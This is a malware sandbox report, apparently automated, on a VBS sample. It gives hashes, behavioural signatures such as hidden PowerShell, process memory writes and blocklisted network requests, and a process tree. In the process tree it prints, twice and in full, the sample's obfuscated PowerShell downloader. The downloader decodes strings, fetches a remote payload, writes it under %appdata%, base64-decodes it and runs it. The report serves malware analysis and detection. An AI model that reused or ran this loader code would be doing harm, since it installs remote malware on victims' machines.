Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
10/06/2024, 13:22
Static task
static1
Behavioral task
behavioral1
Sample
033MSOG241591GHD.out.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
033MSOG241591GHD.out.vbs
Resource
win10v2004-20240426-en
General
-
Target
033MSOG241591GHD.out.vbs
-
Size
22KB
-
MD5
59466d59d80a2429567c23520135b4b6
-
SHA1
13453bf0b8f5b716ad554afed8f8acbf0cb65403
-
SHA256
c2ad492e30a53307f299b6694e479e0d55d0c6e3505c1d7929366e905aab3d9a
-
SHA512
77187a4174d6bc47935aa5962a72cbacf629f1927133879c9957850ca5178e96485cf5dccb3e95b994128b02346a1454c3c6e80b553f7c8f8b207560fc491bf3
-
SSDEEP
384:9Ru1EJgdf/HWD4Zx4vBlxSrfsy1E90TOntMQQ0hkCJUjdxmW:9Ru1NF/WDMxE/xSrfsL90ynK6ZJQxX
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 1680 WScript.exe 19 696 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 696 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 696 powershell.exe 696 powershell.exe 2524 powershell.exe 2524 powershell.exe 2524 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 696 powershell.exe Token: SeDebugPrivilege 2524 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1680 wrote to memory of 696 1680 WScript.exe 88 PID 1680 wrote to memory of 696 1680 WScript.exe 88 PID 696 wrote to memory of 5076 696 powershell.exe 90 PID 696 wrote to memory of 5076 696 powershell.exe 90 PID 696 wrote to memory of 2524 696 powershell.exe 91 PID 696 wrote to memory of 2524 696 powershell.exe 91 PID 696 wrote to memory of 2524 696 powershell.exe 91 PID 2524 wrote to memory of 1896 2524 powershell.exe 92 PID 2524 wrote to memory of 1896 2524 powershell.exe 92 PID 2524 wrote to memory of 1896 2524 powershell.exe 92
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\033MSOG241591GHD.out.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden "$Vurderingsmndene = 1;Function Corbin($overcools){$Tristimulus=$overcools.Length-$Vurderingsmndene;$Bulgy='Substring';For( $Oliekilde17=4;$Oliekilde17 -lt $Tristimulus;$Oliekilde17+=5){$Selfsustainingly+=$overcools.$Bulgy.Invoke( $Oliekilde17, $Vurderingsmndene);}$Selfsustainingly;}function Digitaliser($Fractioning){ & ($Hverne) ($Fractioning);}$Distributrnet=Corbin 'SnapMUnino ParzForeiD,mblmicrlCha,a,jel/Pese5Nucl. Ri,0M.sa Afri(Bei.W BraiUnprnBjniddykkoPenswOve.sprov AfleNnrvrT ove Hedo1 Tri0 ,rk. Fav0bibl; xtr MantWAulei LocnCrat6Uhol4 Lun;Udgi Chufx Rav6Dirk4M ll;Phyl TulirL,erv,kan:Bar,1Reko2 ,av1Stnk.Radi0Slam)Mutt Pan,GTaoie B.wcC,emkStilo Te./Cinc2Bloo0e gl1Dila0mice0Apri1Gods0Ly,r1Bent IndFI.ogiHensrforbeStavfDideoF.agxdism/ G.y1U.nn2 ill1Bort. amb0Stri ';$Admen=Corbin ' Va UKerasFreseGouvrrasp-Gen.Abootg DeleJulenNurst,upe ';$Beerily=Corbin 'EvighPurstovertI.tepLovb:Mode/Beed/C,ese SteqNobeu fleiUnwhpP.sse KonsEa lgInten katSwit.MusisBreva ,pr.Munkc Ty.oltn mRest/ HypBUn rrN taa,ustnSalgdSo.sbposto HlsmGen,bB gieNe fsR gi.,isahpreahFunnk cym ';$Graduerende156=Corbin 'Pseu> Ava ';$Hverne=Corbin 'Sh.cimisseTensx hjt ';$Retrospektions='Gslings';$Adverbialize = Corbin 'BuseeresocselvhWardoOkku Fi,a%Org aBargpT.bup Deldops.a,nmat FinaPrek% Sl.\MiniS Ta t,roniSerolFoollDetaestrblBog.eStrig bi,sPost.Skriu,nkyl D,bvBeta Orga&Ndpl&Gips blinehilbcCe,lh AfsoFrav unretHod ';Digitaliser (Corbin 'D,ge$Melog ortl DanoKon,bL.mbapolil Com: ScaTNitraHul nJ.rddMy.mrDo no GendSacrsInefbWid.e Remtdicon .xidOscierenolDirlsUsp.eSubirE.ols Sma=Emb.(R.vfchypem Aktdfl.e Mell/FipscUnfo sids$ ,ogAAfsndJutlv,esmeTotarKancbIngei.reaa Cy l.aryiSlatz Musebr.s)Coun ');Digitaliser (Corbin 'Brkj$OutrgNe rlHoveoPetrbFosfaSpillCont: DysP H.piSkiln UdrlPaapiDrejgSha,=Dent$Sim.BBouneClioeArnor AnhiMicrlCereyUd.v.H rns,ydrpSelvlBrndisvi.tRese(Lini$Nav GCathrUnimaCaped.tilu .eteFluerSalae .ycnTer,dWiree Fre1Came5 ,ke6Buc.)Matt ');$Beerily=$Pinlig[0];$ustadighedens= (Corbin 'Fash$ MacgGrnslF.kuo Monb ShiaAridlHalf: HilG aute aannMarmn lvee C.nm,avotSk.lrCrepkPr,skWhale KitnF emdJin eUsynsReno= UncN.alae Spewfi.i-DiswOBearbPimpjTaktesplacB votS,ov CandSF gsyPlejs,ilotSvabeSaddm Ton.TornN DameServt H.p. UncWsu,ae Renb olyCOdonlaveriHaireUninn,lomt');$ustadighedens+=$Tandrodsbetndelsers[1];Digitaliser ($ustadighedens);Digitaliser (Corbin 'Isoc$ P aGMaileJerrnHeren egaePuz.mOrtot Knor.uickmystk AlvePol n St dLgehe,abrsPell.Se tHPorgeBrnda anddForee Bder Un.sLap.[He.a$waffA,ysndCacom Pa.e GlonRo o] B,y= Tyd$S,arD,orsih tpsKa.atD,parOm.oi Semb Opsucocrt Untr refnGalee HootVind ');$Tyndvgget=Corbin 'gavs$VectG Sp,e BrsnTrusnLazyedesimStyntU,plr Hagkforck,bseeRe,unHousdAn.ie OnosKo g.IncoDt beoGlauwSukkn fo l KiwotoxiaFiffdTropFComtiHypelB.sie Cla(xe.o$ NriBUne,eSupeeHelbrCisaiHemolAneuy A g,Rhac$Trang repr ForaR innGudeuOverlDrifaTranttechiK.sto Co,nSekseAen.rHystnXra eUnde) non ';$granulationerne=$Tandrodsbetndelsers[0];Digitaliser (Corbin 'skit$kologGldelUndeoEgesbMot.aVestlSemi: MinERes qLoftu begiPrajvSa.moGs.ec livaGrettMa.iiI.puoRac,nrimm=Filt(o.erT,pheeSplksf tit Exc- SupPR oxaStimt,ocohse.i Syvt$in egHolir HolaLyr ndk,iu BedludskaUlpftDeeriArthoI,gan PhyeRe,rr GranPh.teGree)Prep ');while (!$Equivocation) {Digitaliser (Corbin 'Drud$ .ycgAkuplFlago SpobkrlhaReprl Non: P oRFrytaSwahnBumbssp.neSqualMisllRene=Hil,$ ChotS ggr oru,ynseSten ') ;Digitaliser $Tyndvgget;Digitaliser (Corbin ' MotSSynctDrila,enirIndstue f-Nec.S,jrglBuc e,uhae IndpNonm takk4St.r ');Digitaliser (Corbin ' Pa,$Unpag Opsl Si.oTagrbNotaa SemlAmer:VrdiERektqAnt,u.eetiNedsvVandoModec ElvaV,rbtPotoiLit.oFacan,erb=Lydl( FilT Ty,eEntasBri,tmon -IdeaPImpaaDelptUni.hType Bre$ BelgGladrVol,aTokrnKappuForblFontaExpitC,aniVa,ioAnalnPrineMadrrTentnCataeHurl)Haye ') ;Digitaliser (Corbin ' ko,$ToetgSkovlBekro BrnbcaptaNol l Pro: GosG Af.aEle,rrin,dnazeb.issrUdl a ,rdcstereUndl= Mem$ rang GynlSneroUnreb BegaLaudlSnek: StiS.urraOprymForhm.efaeUtron issbVampy orgFuntgLucieToaddSh,ien dp+Redn+Clas%Para$bortP E siAumanPhosl PhoiEx eg.yns.Justc PhooSilhu O,knUd.itCrom ') ;$Beerily=$Pinlig[$Gardbrace];}$Guiding=313361;$Hygsom=28928;Digitaliser (Corbin ' nt$Pharg Wrol ViloAfpubObjeaSoftlRost:BeleLBurdaH.venadvod NyhbOp arRke,uSubsgSy,osM tea Nerr QuiePishaPerdlRec eMisar MatsKr.e R st= Sch AutoGM.lte Agit Tig-B,neCHjemo modnK.autFarleSpiknUnbitProd No m$ iorg AfprScypaLingnAcinu LamlSlanaSalmtInoxiO eroaandnRv reSvirrDes n MbleFree ');Digitaliser (Corbin 'Ven,$ AdmgParalImpao Bryb chra,ffil Mil:DiabrMathe G udSprosTyndtBlocaBarmrConct Br,sQuad Filc= Poo udb[SjufSSubayPenssWarlt .nreVannmHybr.,yksCR,seoAfhnnHelivChuceNoncrI,dmt hje]Rese:Impa:Aft FKal,rY,kao .etm Sp.BAnywa.ults.pile Azt6Copp4Pre SQuittR.mmrpedoiCamonEurygMira(Unde$cataL Ni aA,dinHaardProgbCozyr,urtuOua gvangs B ga torrGia,eD,skaPseuludbue,igmr PhasStat)Kals ');Digitaliser (Corbin 'ti.o$BjrngRel l C uoTilsbKanaa.alelSola:RevaDPyraeSharp R,ae Soondibbd Proa ypon .vrtAbdisSkat Til=T.ve Subt[ImmoSFlomyMi isCyphtHesteDatemHyld. DisT UrieY.guxLap,tFals. BukERevonUti.cUdsmoTrandBnk i AftnOmdegPe t]Yder: Hur:GrunA TekSMob.CGolfIun.eILini.FngsG.lute hentS,seSSkogtSjlerGonoi Nonn Sadgg.yc( mes$ PaarOldbeCorodIsotsJon.tB,ndaLigerCompt HarsVild)Abil ');Digitaliser (Corbin 'Udfa$ lgg.nwolSnekoAngobDeseaFiskl Tot: VowAEntogPromgMo.iePeddlSe,ia Indt ,nuiHor.o s.bnWo,d= Aqu$ R cDZongeDeclpBataeContnZonodAbsia.eginDolltTriqsSkam.AoifsWithuHe.abparos mpot,olkrApotisparnRygtga.an( U,t$HjemG uttuD,foiPrimdBlokiSu.gn s.lgCiv.,Sk.v$ SkrH UdsyDi ggShelsToo oBourm Nep)Vrne ');Digitaliser $Aggelation;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stillelegs.ulv && echo t"3⤵PID:5076
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vurderingsmndene = 1;Function Corbin($overcools){$Tristimulus=$overcools.Length-$Vurderingsmndene;$Bulgy='Substring';For( $Oliekilde17=4;$Oliekilde17 -lt $Tristimulus;$Oliekilde17+=5){$Selfsustainingly+=$overcools.$Bulgy.Invoke( $Oliekilde17, $Vurderingsmndene);}$Selfsustainingly;}function Digitaliser($Fractioning){ & ($Hverne) ($Fractioning);}$Distributrnet=Corbin 'SnapMUnino ParzForeiD,mblmicrlCha,a,jel/Pese5Nucl. Ri,0M.sa Afri(Bei.W BraiUnprnBjniddykkoPenswOve.sprov AfleNnrvrT ove Hedo1 Tri0 ,rk. Fav0bibl; xtr MantWAulei LocnCrat6Uhol4 Lun;Udgi Chufx Rav6Dirk4M ll;Phyl TulirL,erv,kan:Bar,1Reko2 ,av1Stnk.Radi0Slam)Mutt Pan,GTaoie B.wcC,emkStilo Te./Cinc2Bloo0e gl1Dila0mice0Apri1Gods0Ly,r1Bent IndFI.ogiHensrforbeStavfDideoF.agxdism/ G.y1U.nn2 ill1Bort. amb0Stri ';$Admen=Corbin ' Va UKerasFreseGouvrrasp-Gen.Abootg DeleJulenNurst,upe ';$Beerily=Corbin 'EvighPurstovertI.tepLovb:Mode/Beed/C,ese SteqNobeu fleiUnwhpP.sse KonsEa lgInten katSwit.MusisBreva ,pr.Munkc Ty.oltn mRest/ HypBUn rrN taa,ustnSalgdSo.sbposto HlsmGen,bB gieNe fsR gi.,isahpreahFunnk cym ';$Graduerende156=Corbin 'Pseu> Ava ';$Hverne=Corbin 'Sh.cimisseTensx hjt ';$Retrospektions='Gslings';$Adverbialize = Corbin 'BuseeresocselvhWardoOkku Fi,a%Org aBargpT.bup Deldops.a,nmat FinaPrek% Sl.\MiniS Ta t,roniSerolFoollDetaestrblBog.eStrig bi,sPost.Skriu,nkyl D,bvBeta Orga&Ndpl&Gips blinehilbcCe,lh AfsoFrav unretHod ';Digitaliser (Corbin 'D,ge$Melog ortl DanoKon,bL.mbapolil Com: ScaTNitraHul nJ.rddMy.mrDo no GendSacrsInefbWid.e Remtdicon .xidOscierenolDirlsUsp.eSubirE.ols Sma=Emb.(R.vfchypem Aktdfl.e Mell/FipscUnfo sids$ ,ogAAfsndJutlv,esmeTotarKancbIngei.reaa Cy l.aryiSlatz Musebr.s)Coun ');Digitaliser (Corbin 'Brkj$OutrgNe rlHoveoPetrbFosfaSpillCont: DysP H.piSkiln UdrlPaapiDrejgSha,=Dent$Sim.BBouneClioeArnor AnhiMicrlCereyUd.v.H rns,ydrpSelvlBrndisvi.tRese(Lini$Nav GCathrUnimaCaped.tilu .eteFluerSalae .ycnTer,dWiree Fre1Came5 ,ke6Buc.)Matt ');$Beerily=$Pinlig[0];$ustadighedens= (Corbin 'Fash$ MacgGrnslF.kuo Monb ShiaAridlHalf: HilG aute aannMarmn lvee C.nm,avotSk.lrCrepkPr,skWhale KitnF emdJin eUsynsReno= UncN.alae Spewfi.i-DiswOBearbPimpjTaktesplacB votS,ov CandSF gsyPlejs,ilotSvabeSaddm Ton.TornN DameServt H.p. UncWsu,ae Renb olyCOdonlaveriHaireUninn,lomt');$ustadighedens+=$Tandrodsbetndelsers[1];Digitaliser ($ustadighedens);Digitaliser (Corbin 'Isoc$ P aGMaileJerrnHeren egaePuz.mOrtot Knor.uickmystk AlvePol n St dLgehe,abrsPell.Se tHPorgeBrnda anddForee Bder Un.sLap.[He.a$waffA,ysndCacom Pa.e GlonRo o] B,y= Tyd$S,arD,orsih tpsKa.atD,parOm.oi Semb Opsucocrt Untr refnGalee HootVind ');$Tyndvgget=Corbin 'gavs$VectG Sp,e BrsnTrusnLazyedesimStyntU,plr Hagkforck,bseeRe,unHousdAn.ie OnosKo g.IncoDt beoGlauwSukkn fo l KiwotoxiaFiffdTropFComtiHypelB.sie Cla(xe.o$ NriBUne,eSupeeHelbrCisaiHemolAneuy A g,Rhac$Trang repr ForaR innGudeuOverlDrifaTranttechiK.sto Co,nSekseAen.rHystnXra eUnde) non ';$granulationerne=$Tandrodsbetndelsers[0];Digitaliser (Corbin 'skit$kologGldelUndeoEgesbMot.aVestlSemi: MinERes qLoftu begiPrajvSa.moGs.ec livaGrettMa.iiI.puoRac,nrimm=Filt(o.erT,pheeSplksf tit Exc- SupPR oxaStimt,ocohse.i Syvt$in egHolir HolaLyr ndk,iu BedludskaUlpftDeeriArthoI,gan PhyeRe,rr GranPh.teGree)Prep ');while (!$Equivocation) {Digitaliser (Corbin 'Drud$ .ycgAkuplFlago SpobkrlhaReprl Non: P oRFrytaSwahnBumbssp.neSqualMisllRene=Hil,$ ChotS ggr oru,ynseSten ') ;Digitaliser $Tyndvgget;Digitaliser (Corbin ' MotSSynctDrila,enirIndstue f-Nec.S,jrglBuc e,uhae IndpNonm takk4St.r ');Digitaliser (Corbin ' Pa,$Unpag Opsl Si.oTagrbNotaa SemlAmer:VrdiERektqAnt,u.eetiNedsvVandoModec ElvaV,rbtPotoiLit.oFacan,erb=Lydl( FilT Ty,eEntasBri,tmon -IdeaPImpaaDelptUni.hType Bre$ BelgGladrVol,aTokrnKappuForblFontaExpitC,aniVa,ioAnalnPrineMadrrTentnCataeHurl)Haye ') ;Digitaliser (Corbin ' ko,$ToetgSkovlBekro BrnbcaptaNol l Pro: GosG Af.aEle,rrin,dnazeb.issrUdl a ,rdcstereUndl= Mem$ rang GynlSneroUnreb BegaLaudlSnek: StiS.urraOprymForhm.efaeUtron issbVampy orgFuntgLucieToaddSh,ien dp+Redn+Clas%Para$bortP E siAumanPhosl PhoiEx eg.yns.Justc PhooSilhu O,knUd.itCrom ') ;$Beerily=$Pinlig[$Gardbrace];}$Guiding=313361;$Hygsom=28928;Digitaliser (Corbin ' nt$Pharg Wrol ViloAfpubObjeaSoftlRost:BeleLBurdaH.venadvod NyhbOp arRke,uSubsgSy,osM tea Nerr QuiePishaPerdlRec eMisar MatsKr.e R st= Sch AutoGM.lte Agit Tig-B,neCHjemo modnK.autFarleSpiknUnbitProd No m$ iorg AfprScypaLingnAcinu LamlSlanaSalmtInoxiO eroaandnRv reSvirrDes n MbleFree ');Digitaliser (Corbin 'Ven,$ AdmgParalImpao Bryb chra,ffil Mil:DiabrMathe G udSprosTyndtBlocaBarmrConct Br,sQuad Filc= Poo udb[SjufSSubayPenssWarlt .nreVannmHybr.,yksCR,seoAfhnnHelivChuceNoncrI,dmt hje]Rese:Impa:Aft FKal,rY,kao .etm Sp.BAnywa.ults.pile Azt6Copp4Pre SQuittR.mmrpedoiCamonEurygMira(Unde$cataL Ni aA,dinHaardProgbCozyr,urtuOua gvangs B ga torrGia,eD,skaPseuludbue,igmr PhasStat)Kals ');Digitaliser (Corbin 'ti.o$BjrngRel l C uoTilsbKanaa.alelSola:RevaDPyraeSharp R,ae Soondibbd Proa ypon .vrtAbdisSkat Til=T.ve Subt[ImmoSFlomyMi isCyphtHesteDatemHyld. DisT UrieY.guxLap,tFals. BukERevonUti.cUdsmoTrandBnk i AftnOmdegPe t]Yder: Hur:GrunA TekSMob.CGolfIun.eILini.FngsG.lute hentS,seSSkogtSjlerGonoi Nonn Sadgg.yc( mes$ PaarOldbeCorodIsotsJon.tB,ndaLigerCompt HarsVild)Abil ');Digitaliser (Corbin 'Udfa$ lgg.nwolSnekoAngobDeseaFiskl Tot: VowAEntogPromgMo.iePeddlSe,ia Indt ,nuiHor.o s.bnWo,d= Aqu$ R cDZongeDeclpBataeContnZonodAbsia.eginDolltTriqsSkam.AoifsWithuHe.abparos mpot,olkrApotisparnRygtga.an( U,t$HjemG uttuD,foiPrimdBlokiSu.gn s.lgCiv.,Sk.v$ SkrH UdsyDi ggShelsToo oBourm Nep)Vrne ');Digitaliser $Aggelation;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stillelegs.ulv && echo t"4⤵PID:1896
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
445KB
MD555637e3c8b1599767fc3678c12d4f158
SHA101757599794dcd1f72dbb7cdde2f1d77dc643d6c
SHA2561c159d03f6942cb5d49ba980c88c10a4f88eeca751211f644ffa6f376edbbe85
SHA5127f8d9149ab9ceb23913372a44205cb1615f6f3a9457940a6e6cd7e45e8c1b0e7fff5ec3cc6da2ffb07d0ac8f80d3f77a65693d6079b5ab8843f4f038e400c633